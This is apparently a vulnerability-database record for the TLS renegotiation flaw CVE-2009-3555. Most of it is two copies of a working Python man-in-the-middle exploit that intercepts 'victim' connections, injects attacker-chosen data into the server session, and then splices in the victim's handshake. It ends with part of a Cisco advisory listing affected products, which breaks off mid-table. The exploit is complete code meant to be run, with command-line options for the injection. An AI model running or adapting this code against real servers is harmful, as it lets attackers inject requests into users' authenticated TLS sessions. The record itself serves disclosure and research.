0\n msg_type = tlslite.constants.ContentType.handshake\n record = sock.recv(msg_length)\n else:\n header = sock.recv(4)\n msg_type = header_bytes[0]\n msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBH', header)\n record = sock.recv(msg_length)\n\n return msg_type, msg_version_major, msg_version_minor, record\n\ndef send_hello_request(sock):\n sock.send(\"\\x16\" # Record Layer: Handshake Message\n +\"\\x03\\x01\" # Record Layer Version: TLS 1.0\n +\"\\x00\\x04\" # Record Layer Length: 4\n +\"\\x00\" # Handshake Message Type: Hello Request\n +\"\\x00\\x00\\x00\") # Handshake Message Length: 0\n\ndef send_protocol_version_alert(sock):\n sock.send(\"\\x15\" # Record Layer: Alert\"\n +\"\\x03\\x01\" # Record Layer Version: TLS 1.0\n +\"\\x00\\x02\" # Record Layer Length: 2\n +\"\\x00\" # Alert Message: fatal\n +\"\\x46\") # Alert Message: protocol version\n\n\ndef handle_victim(victim, options, mitmcount):\n\n if options.one_shot and mitmcount != 0:\n print threading.current_thread().name, '--one-shot specified and initial connection already handled, forwarding only'\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n sock.connect(options.target)\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\n except socket.error, ex:\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\n sys.exit(1)\n\n t1 = threading.Thread(target=forward, args=(sock, victim))\n t1.start()\n\n t2 = threading.Thread(target=forward, args=(victim, sock))\n t2.start()\n\n t1.join()\n sock.close()\n\n t2.join()\n victim.close()\n return\n\n # obtain initial \"client hello\" message\n msg_type, msg_version_major, msg_version_minor, hello_msg = recv_clienthello(victim)\n if msg_version_major == 2:\n print threading.current_thread().name, \"client sent SSLv2 client hello message, exiting thread\"\n return\n\n 
tls_version = (msg_version_major, msg_version_minor)\n type, length, version_major, version_minor, random, session_id_length = struct.unpack('!B3sBB32sB', hello_msg[:39])\n resume_session = (session_id_length != 0)\n if resume_session:\n print threading.current_thread().name, \"client attempting to resume session\"\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n sock.connect(options.target)\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\n except socket.error, ex:\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\n sys.exit(1)\n\n\n sslsock = tlslite.api.TLSConnection(sock)\n handshake_settings = tlslite.HandshakeSettings.HandshakeSettings()\n handshake_settings.minVersion = tls_version\n handshake_settings.maxVersion = tls_version\n sslsock.handshakeClientCert(settings = handshake_settings)\n\n # inject prefix\n sslsock.write(options.inject)\n print threading.current_thread().name, 'Injected %s' % repr(options.inject)\n\n # send original \"client hello\" message over the encrypted channel\n send_encapsulated(sslsock, 22, hello_msg, tls_version)\n\n # now receive serveral TLS messages from the server, decrypt them, and forward\n # them to the client, until the server sends \"server hello done\"\n # these messages include \"server hello\", \"certificate\", \"server key exchange\",\n # unless the client is trying to resume a previous session\n print threading.current_thread().name, \"about to receive server handshake messages\"\n server_handshake_done = False\n while not server_handshake_done:\n msg_type, msg_version_major, msg_version_minor, result = recv_record(sslsock.sock)\n if result:\n result = decrypt_record(sslsock, msg_type, result)\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\n if result[0] == 0x0e: # server hello done - should terminate 
handshake\n server_handshake_done = True\n elif resume_session and msg_type == 0x14: # change cipher spec - probably irrelevant\n server_handshake_done = True\n else:\n print threading.current_thread().name, 'receive from server failed, exiting thread'\n return\n print threading.current_thread().name, \"server handshake done\"\n\n\n # now its the the client's turn to send some messages, e.g.\n # \"client key exchange\" and \"change cipher spec\"\n print threading.current_thread().name, \"about to receive client handshake messages\"\n handshake_finished = False\n while not handshake_finished:\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\n print threading.current_thread().name, msg_type\n send_encapsulated(sslsock, msg_type, record, tls_version)\n if msg_type == 0x14: # change cipher spec\n handshake_finished = True\n\n print threading.current_thread().name, \"client handshake done\"\n\n # message after \"change cipher spec\" must be sent in the \"clear\"\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\n send_record(sslsock.sock, msg_type, msg_version_major, msg_version_minor, record)\n\n # server should now send \"change cipher spec\" message, we decrypt and send that to the victim\n msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)\n result = decrypt_record(sslsock, msg_type, record)\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\n\n # finalize handshake\n msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)\n if record:\n send_record(victim, msg_type, msg_version_major, msg_version_minor, record)\n else:\n sslsock.sock.close()\n victim.close()\n del sslsock\n return\n\n\n\n # the rest is just forwarding TLS records between both parties,\n # which we cannot interfere with anymore, apart from dropping server\n # responses\n if options.drop:\n sslsock.sock.close()\n del sslsock\n else:\n t1 = 
threading.Thread(target=forward, args=(sslsock.sock, victim))\n t1.start()\n\n t2 = threading.Thread(target=forward, args=(victim, sslsock.sock))\n t2.start()\n\n if not options.drop:\n t1.join()\n sslsock.sock.close()\n\n t2.join()\n victim.close()\n\n\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n parser.add_option('-l', '--listen', dest='listen_port', help='port to listen on', metavar='PORT', type='int', default=8443)\n parser.add_option('-b', '--bind', dest='bind_address', help='address to bind to', metavar='ADDRESS', default='0.0.0.0')\n parser.add_option('-t', '--target', dest='target', help='host and port to connect to', metavar='HOST:PORT' )\n parser.add_option('-i', '--inject', dest='inject', help='string to inject', metavar='DATA')\n parser.add_option('', '--inject-file', dest='inject_file', help='inject data from a file', metavar='FILE')\n parser.add_option('', '--inject-base64', dest='inject_base64', help='string to inject, base64-encoded', metavar='DATA')\n parser.add_option('-o', '--one-shot', dest='one_shot', action='store_true', help='only mitm the first connection attempt, forward all other connections')\n parser.add_option('-d', '--drop-responses', dest='drop', action=\"store_true\", default=False, help='drop server responses after renegotiating')\n\n (options, args) = parser.parse_args()\n\n if len([i for i in (options.inject, options.inject_file, options.inject_base64) if i]) != 1:\n print 'Exactly one injection option must be specified'\n sys.exit(1)\n\n if options.inject_file:\n try:\n options.inject = open(options.inject_file, 'r').read()\n except IOError, ex:\n print ex\n sys.exit(1)\n\n if options.inject_base64:\n import base64\n try:\n options.inject = base64.decodestring(options.inject_base64)\n except base64.binascii.Error, ex:\n print 'Error decoding base64 data: %s' % ex\n sys.exit(1)\n\n\n if not options.listen_port or \\\n not options.bind_address or \\\n not options.target or \\\n not options.inject:\n 
parser.print_help()\n sys.exit(1)\n\n target = options.target.split(':')\n if len(target)==2:\n try:\n target[1] = int(target[1])\n except ValueError:\n target[1] = None\n if len(target)!=2 or not target[0] or not target[1]:\n print 'Target \\'%s\\' not in format HOST:PORT' % options.target\n sys.exit(1)\n\n options.target = tuple(target)\n\n try:\n listensocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n listensocket.bind((options.bind_address, options.listen_port))\n print 'Listening on %s:%u' % (options.bind_address, options.listen_port)\n except socket.error, ex:\n print 'Couldn\\'t listen on %s:%u' % (options.bind_address, options.listen_port)\n print 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\n sys.exit(1)\n\n listensocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n listensocket.listen(5)\n\n mitmcount = 0\n\n while True:\n try:\n victim, victimaddr = listensocket.accept()\n print 'New connection from %s:%u' % victimaddr\n\n threading.Thread(target=handle_victim, args=(victim, options, mitmcount)).start()\n mitmcount += 1\n\n except KeyboardInterrupt, ex:\n print '\\nAborted by user, exiting...'\n listensocket.close()\n sys.exit(1)", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T15:57:49", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "TLS Renegotiation Vulnerability PoC", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3555"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67231", "id": "SSV:67231", "sourceData": "\n #!/usr/bin/env python\r\n\r\n######################################\r\n# #\r\n# RedTeam Pentesting GmbH #\r\n# kontakt@redteam-pentesting.de #\r\n# http://www.redteam-pentesting.de #\r\n# #\r\n######################################\r\n\r\n# PoC exploit for the TLS renegotiation vulnerability (CVE-2009-3555)\r\n\r\n# License\r\n# -------\r\n# CC-BY-SA 
http://creativecommons.org/licenses/by-sa/3.0/\r\n\r\n# Timeline\r\n# --------\r\n# 2009-12-21 initial public release\r\n\r\n# Known Issues\r\n# ------------\r\n# Firefox: if it fails connecting to a TLS site too often, falls back to\r\n# issuing SSLv2 ClientHello only until browser is restarted\r\n#\r\n# wget: attempts SSLv2 ClientHello by default\r\n\r\n# References\r\n# ----------\r\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\r\n# http://www.phonefactor.com/sslgap\r\n# http://www.extendedsubset.com/\r\n# http://www.g-sec.lu/practicaltls.pdf\r\n# http://tools.ietf.org/html/draft-ietf-tls-renegotiation-01\r\n\r\nimport tlslite\r\nimport tlslite.api\r\nimport tlslite.messages\r\nimport tlslite.constants\r\nimport struct\r\nimport socket\r\nimport threading\r\nimport array\r\nimport sys\r\nimport optparse\r\n\r\n\r\nif not hasattr(threading.Thread, 'name'):\r\n # emulate python 2.6 threading module for earlier versions\r\n threading.current_thread = threading.currentThread\r\n setattr(threading.Thread, 'name',\r\n property(threading.Thread.getName, threading.Thread.setName))\r\n\r\ndef forward(sock1, sock2):\r\n sock1.settimeout(1.0)\r\n while True:\r\n try:\r\n data = sock1.recv(4096)\r\n if not data:\r\n return\r\n sock2.send(data)\r\n except socket.error, ex_error:\r\n if ex_error[0] == 104: # Connection reset by peer\r\n return\r\n except socket.timeout, ex_timeout:\r\n pass\r\n\r\n\r\nclass MessageWrapper(object):\r\n def __init__(self, version = (3, 1), ssl2 = False):\r\n self.contentType = tlslite.messages.ContentType.handshake\r\n self.ssl2 = ssl2\r\n self.client_version = version\r\n\r\n def setType(self, type):\r\n self.contentType = type\r\n\r\n def addBytes(self, bytes):\r\n self.bytes = bytes\r\n\r\n def write(self, trial=False):\r\n if trial:\r\n raise Exception('Unsupported')\r\n return array.array('B', self.bytes)\r\n\r\ndef send_record(sock, msg_type, version_major, version_minor, record):\r\n msg = struct.pack('!BBBH', msg_type, 
version_major, version_minor, len(record))\r\n if type(record) != str:\r\n msg += record.tostring()\r\n else:\r\n msg += record\r\n sock.send(msg)\r\n\r\ndef send_encapsulated(sslsock, type, messagebytes, version = (3, 1)):\r\n msg = MessageWrapper(version)\r\n msg.addBytes(struct.unpack('B'*len(messagebytes), messagebytes))\r\n msg.setType(type)\r\n for dummy in sslsock._sendMsg(msg, True):\r\n pass\r\n\r\ndef decrypt_record(sslsock, type, recordbytes):\r\n for result in sslsock._decryptRecord(type, array.array('B', recordbytes)):\r\n pass\r\n return result\r\n\r\ndef recv_record(sock):\r\n try:\r\n header = sock.recv(5)\r\n if not header:\r\n return None, None, None, None\r\n msg_type, msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBBH', header)\r\n record = ''\r\n while len(record) != msg_length:\r\n record += sock.recv(msg_length - len(record))\r\n return msg_type, msg_version_major, msg_version_minor, record\r\n except socket.error, ex:\r\n if ex[0] == 104: # Connection reset by peer\r\n return\r\n\r\ndef recv_clienthello(sock):\r\n header_bytes = []\r\n header_bytes.append(sock.recv(1))\r\n header_bytes[0] = struct.unpack('!B', header_bytes[0])[0]\r\n if header_bytes[0] & 0x80:\r\n # Version 2.0 Client "Record Layer"\r\n header_bytes.append(sock.recv(1))\r\n header_bytes[1] = struct.unpack('!B', header_bytes[1])[0]\r\n msg_length = (header_bytes[0] & 0x7f) << 8 | header_bytes[1]\r\n msg_version_major = 2\r\n msg_version_minor = 0\r\n msg_type = tlslite.constants.ContentType.handshake\r\n record = sock.recv(msg_length)\r\n else:\r\n header = sock.recv(4)\r\n msg_type = header_bytes[0]\r\n msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBH', header)\r\n record = sock.recv(msg_length)\r\n\r\n return msg_type, msg_version_major, msg_version_minor, record\r\n\r\ndef send_hello_request(sock):\r\n sock.send("\\x16" # Record Layer: Handshake Message\r\n +"\\x03\\x01" # Record Layer Version: TLS 1.0\r\n +"\\x00\\x04" # Record 
Layer Length: 4\r\n +"\\x00" # Handshake Message Type: Hello Request\r\n +"\\x00\\x00\\x00") # Handshake Message Length: 0\r\n\r\ndef send_protocol_version_alert(sock):\r\n sock.send("\\x15" # Record Layer: Alert"\r\n +"\\x03\\x01" # Record Layer Version: TLS 1.0\r\n +"\\x00\\x02" # Record Layer Length: 2\r\n +"\\x00" # Alert Message: fatal\r\n +"\\x46") # Alert Message: protocol version\r\n\r\n\r\ndef handle_victim(victim, options, mitmcount):\r\n\r\n if options.one_shot and mitmcount != 0:\r\n print threading.current_thread().name, '--one-shot specified and initial connection already handled, forwarding only'\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect(options.target)\r\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\r\n except socket.error, ex:\r\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\r\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n t1 = threading.Thread(target=forward, args=(sock, victim))\r\n t1.start()\r\n\r\n t2 = threading.Thread(target=forward, args=(victim, sock))\r\n t2.start()\r\n\r\n t1.join()\r\n sock.close()\r\n\r\n t2.join()\r\n victim.close()\r\n return\r\n\r\n # obtain initial "client hello" message\r\n msg_type, msg_version_major, msg_version_minor, hello_msg = recv_clienthello(victim)\r\n if msg_version_major == 2:\r\n print threading.current_thread().name, "client sent SSLv2 client hello message, exiting thread"\r\n return\r\n\r\n tls_version = (msg_version_major, msg_version_minor)\r\n type, length, version_major, version_minor, random, session_id_length = struct.unpack('!B3sBB32sB', hello_msg[:39])\r\n resume_session = (session_id_length != 0)\r\n if resume_session:\r\n print threading.current_thread().name, "client attempting to resume session"\r\n\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n 
sock.connect(options.target)\r\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\r\n except socket.error, ex:\r\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\r\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n\r\n sslsock = tlslite.api.TLSConnection(sock)\r\n handshake_settings = tlslite.HandshakeSettings.HandshakeSettings()\r\n handshake_settings.minVersion = tls_version\r\n handshake_settings.maxVersion = tls_version\r\n sslsock.handshakeClientCert(settings = handshake_settings)\r\n\r\n # inject prefix\r\n sslsock.write(options.inject)\r\n print threading.current_thread().name, 'Injected %s' % repr(options.inject)\r\n\r\n # send original "client hello" message over the encrypted channel\r\n send_encapsulated(sslsock, 22, hello_msg, tls_version)\r\n\r\n # now receive serveral TLS messages from the server, decrypt them, and forward\r\n # them to the client, until the server sends "server hello done"\r\n # these messages include "server hello", "certificate", "server key exchange",\r\n # unless the client is trying to resume a previous session\r\n print threading.current_thread().name, "about to receive server handshake messages"\r\n server_handshake_done = False\r\n while not server_handshake_done:\r\n msg_type, msg_version_major, msg_version_minor, result = recv_record(sslsock.sock)\r\n if result:\r\n result = decrypt_record(sslsock, msg_type, result)\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\r\n if result[0] == 0x0e: # server hello done - should terminate handshake\r\n server_handshake_done = True\r\n elif resume_session and msg_type == 0x14: # change cipher spec - probably irrelevant\r\n server_handshake_done = True\r\n else:\r\n print threading.current_thread().name, 'receive from server failed, exiting thread'\r\n return\r\n print threading.current_thread().name, "server handshake 
done"\r\n\r\n\r\n # now its the the client's turn to send some messages, e.g.\r\n # "client key exchange" and "change cipher spec"\r\n print threading.current_thread().name, "about to receive client handshake messages"\r\n handshake_finished = False\r\n while not handshake_finished:\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\r\n print threading.current_thread().name, msg_type\r\n send_encapsulated(sslsock, msg_type, record, tls_version)\r\n if msg_type == 0x14: # change cipher spec\r\n handshake_finished = True\r\n\r\n print threading.current_thread().name, "client handshake done"\r\n\r\n # message after "change cipher spec" must be sent in the "clear"\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\r\n send_record(sslsock.sock, msg_type, msg_version_major, msg_version_minor, record)\r\n\r\n # server should now send "change cipher spec" message, we decrypt and send that to the victim\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)\r\n result = decrypt_record(sslsock, msg_type, record)\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\r\n\r\n # finalize handshake\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)\r\n if record:\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, record)\r\n else:\r\n sslsock.sock.close()\r\n victim.close()\r\n del sslsock\r\n return\r\n\r\n\r\n\r\n # the rest is just forwarding TLS records between both parties,\r\n # which we cannot interfere with anymore, apart from dropping server\r\n # responses\r\n if options.drop:\r\n sslsock.sock.close()\r\n del sslsock\r\n else:\r\n t1 = threading.Thread(target=forward, args=(sslsock.sock, victim))\r\n t1.start()\r\n\r\n t2 = threading.Thread(target=forward, args=(victim, sslsock.sock))\r\n t2.start()\r\n\r\n if not options.drop:\r\n t1.join()\r\n sslsock.sock.close()\r\n\r\n t2.join()\r\n 
victim.close()\r\n\r\n\r\n\r\nif __name__ == "__main__":\r\n parser = optparse.OptionParser()\r\n parser.add_option('-l', '--listen', dest='listen_port', help='port to listen on', metavar='PORT', type='int', default=8443)\r\n parser.add_option('-b', '--bind', dest='bind_address', help='address to bind to', metavar='ADDRESS', default='0.0.0.0')\r\n parser.add_option('-t', '--target', dest='target', help='host and port to connect to', metavar='HOST:PORT' )\r\n parser.add_option('-i', '--inject', dest='inject', help='string to inject', metavar='DATA')\r\n parser.add_option('', '--inject-file', dest='inject_file', help='inject data from a file', metavar='FILE')\r\n parser.add_option('', '--inject-base64', dest='inject_base64', help='string to inject, base64-encoded', metavar='DATA')\r\n parser.add_option('-o', '--one-shot', dest='one_shot', action='store_true', help='only mitm the first connection attempt, forward all other connections')\r\n parser.add_option('-d', '--drop-responses', dest='drop', action="store_true", default=False, help='drop server responses after renegotiating')\r\n\r\n (options, args) = parser.parse_args()\r\n\r\n if len([i for i in (options.inject, options.inject_file, options.inject_base64) if i]) != 1:\r\n print 'Exactly one injection option must be specified'\r\n sys.exit(1)\r\n\r\n if options.inject_file:\r\n try:\r\n options.inject = open(options.inject_file, 'r').read()\r\n except IOError, ex:\r\n print ex\r\n sys.exit(1)\r\n\r\n if options.inject_base64:\r\n import base64\r\n try:\r\n options.inject = base64.decodestring(options.inject_base64)\r\n except base64.binascii.Error, ex:\r\n print 'Error decoding base64 data: %s' % ex\r\n sys.exit(1)\r\n\r\n\r\n if not options.listen_port or \\\r\n not options.bind_address or \\\r\n not options.target or \\\r\n not options.inject:\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n target = options.target.split(':')\r\n if len(target)==2:\r\n try:\r\n target[1] = int(target[1])\r\n except 
ValueError:\r\n target[1] = None\r\n if len(target)!=2 or not target[0] or not target[1]:\r\n print 'Target \\'%s\\' not in format HOST:PORT' % options.target\r\n sys.exit(1)\r\n\r\n options.target = tuple(target)\r\n\r\n try:\r\n listensocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n listensocket.bind((options.bind_address, options.listen_port))\r\n print 'Listening on %s:%u' % (options.bind_address, options.listen_port)\r\n except socket.error, ex:\r\n print 'Couldn\\'t listen on %s:%u' % (options.bind_address, options.listen_port)\r\n print 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n listensocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n listensocket.listen(5)\r\n\r\n mitmcount = 0\r\n\r\n while True:\r\n try:\r\n victim, victimaddr = listensocket.accept()\r\n print 'New connection from %s:%u' % victimaddr\r\n\r\n threading.Thread(target=handle_victim, args=(victim, options, mitmcount)).start()\r\n mitmcount += 1\r\n\r\n except KeyboardInterrupt, ex:\r\n print '\\nAborted by user, exiting...'\r\n listensocket.close()\r\n sys.exit(1)\r\n\r\n\n ", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-67231"}, {"lastseen": "2017-11-19T18:30:52", "description": "No description provided by source.", "published": "2009-11-10T00:00:00", "type": "seebug", "title": "Cisco Security Advisory: Transport Layer Security Renegotiation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3555"], "modified": "2009-11-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12600", "id": "SSV:12600", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCisco Security Advisory: Transport Layer Security Renegotiation\r\nVulnerability\r\n\r\nAdvisory ID: cisco-sa-20091109-tls\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml\r\n\r\nRevision 1.0\r\n\r\nFor Public Release 2009 November 9 
1600 UTC (GMT)\r\n\r\nSummary\r\n=======\r\n\r\nAn industry-wide vulnerability exists in the Transport Layer Security\r\n(TLS) protocol that could impact any Cisco product that uses any version\r\nof TLS and SSL. The vulnerability exists in how the protocol handles\r\nsession renegotiation and exposes users to a potential man-in-the-middle\r\nattack.\r\n\r\nThis advisory is posted at\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml.\r\n\r\nAffected Products\r\n=================\r\n\r\nCisco is currently evaluating products for possible exposure to these\r\nTLS issues. Products will only be listed in the Vulnerable Products or\r\nProducts Confirmed Not Vulnerable sections of this advisory when a final\r\ndetermination about product exposure is made. Products that are not\r\nlisted in either of these two sections are still being evaluated.\r\n\r\nVulnerable Products\r\n- -------------------\r\n\r\nThis section will be updated when more information is available.\r\n\r\nProducts Confirmed Not Vulnerable\r\n- ---------------------------------\r\n\r\nThe following products are confirmed not vulnerable:\r\n\r\n * Cisco AnyConnect VPN Client\r\n\r\nThis section will be updated when more information is available.\r\n\r\nDetails\r\n=======\r\n\r\nTLS and its predecessor, SSL, are cryptographic protocols that provide\r\nsecurity for communications over IP data networks such as the Internet.\r\nAn industry-wide vulnerability exists in the TLS protocol that could\r\nimpact any Cisco product that uses any version of TLS and SSL. The\r\nvulnerability exists in how the protocol handles session renegotiation\r\nand exposes users to a potential man-in-the-middle attack.\r\n\r\nThe following Cisco Bug IDs are being used to track potential exposure\r\nto the SSL and TLS issues. 
The bugs listed below do not confirm\r\nthat a product is vulnerable, but rather that the product is under\r\ninvestigation by the appropriate product teams.\r\n\r\nRegistered Cisco customers can view these bugs via Cisco's Bug Toolkit:\r\nhttp://www.cisco.com/pcgi-bin/Support/Bugtool/launch_bugtool.pl\r\n\r\n+------------------------------------------------------------+\r\n| Product | Bug ID |\r\n|----------------------------+-------------------------------|\r\n| Cisco Adaptive Security | CSCtd01491 |\r\n| Device Manager (ASDM) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AON Software | CSCtd01646 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AON Healthcare for | CSCtd01652 |\r\n| HIPAA and ePrescription | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Application and | CSCtd01529 |\r\n| Content Networking System | |\r\n| (ACNS) Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Application | CSCtd01480 |\r\n| Networking Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ASA 5500 Series | CSCtd00697 |\r\n| Adaptive Security | |\r\n| Appliances | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ASA Advanced | |\r\n| Inspection and Prevention | CSCtd01539 |\r\n| (AIP) Security Services | |\r\n| Module | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AVS 3100 Series | CSCtd01566 |\r\n| Application Velocity | |\r\n| System | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Catalyst 6500 Series | CSCtd06389 |\r\n| SSL Services Module | |\r\n|----------------------------+-------------------------------|\r\n| Firewall Services Module | CSCtd04061 |\r\n| FWSM | |\r\n|----------------------------+-------------------------------|\r\n| Cisco CSS 11000 Series | CSCtd01636 |\r\n| Content Services 
Switches | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified SIP Phones | CSCtd01446 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Data Center Network | CSCtd02635 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Data Mobility | CSCtd02642 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01703 |\r\n| Encoders | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01692 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01718 |\r\n| Players | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Emergency Responder | CSCtd02650 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS Software | CSCtd00658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS XE Software | CSCtd00658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS XR Software | CSCtd02658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IP Communicator | CSCtd02662 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| CATOS | CSCtd00662 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IronPort Appliances | CSCtd02069 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified MeetingPlace | CSCtd02709 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Appliance (Clean | CSCtd01453 |\r\n| Access) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Guest Server | CSCtd01462 |\r\n| | 
|\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Profiler | CSCtd02716 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Analysis | CSCtd02729 |\r\n| Module Software (NAM) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Registrar | CSCtd02748 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ONS 15500 Series | CSCtd02769 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Access | CSCtd02777 |\r\n| Gateways | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Access | CSCtd03912 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Security | CSCtd03920 |\r\n| ISM | |\r\n|----------------------------+-------------------------------|\r\n| Cisco QoS Device Manager | CSCtd03923 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Access | CSCtd00725 |\r\n| Control Server (ACS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Desktop | CSCtd03928 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Services | CSCtd03935 |\r\n| Client | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Security Agent CSA | CSCtd02689 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Security Monitoring, | CSCtd02654 |\r\n| Analysis and Response | |\r\n| System (MARS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified IP Phones | CSCtd04121 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Service Control | CSCtd04171 |\r\n| Subscriber Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco TelePresence 
Manager | CSCtd01771 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Telepresence for Consumer | CSCtd01752 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco TelePresence | CSCtd01742 |\r\n| Recording Server | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Asset | CSCtd04198 |\r\n| Collector | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified | CSCtd01282 |\r\n| Communications Manager | |\r\n| (CallManager) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Business | CSCtd05731 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Enterprise | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Express | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05755 |\r\n| Center Management Portal | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Products | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Department | CSCtd05733 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified E-Mail | CSCtd05756 |\r\n| Interaction Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Enterprise | CSCtd05735 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobile | CSCtd05762 |\r\n| Communicator | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobility | CSCtd05786 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobility | 
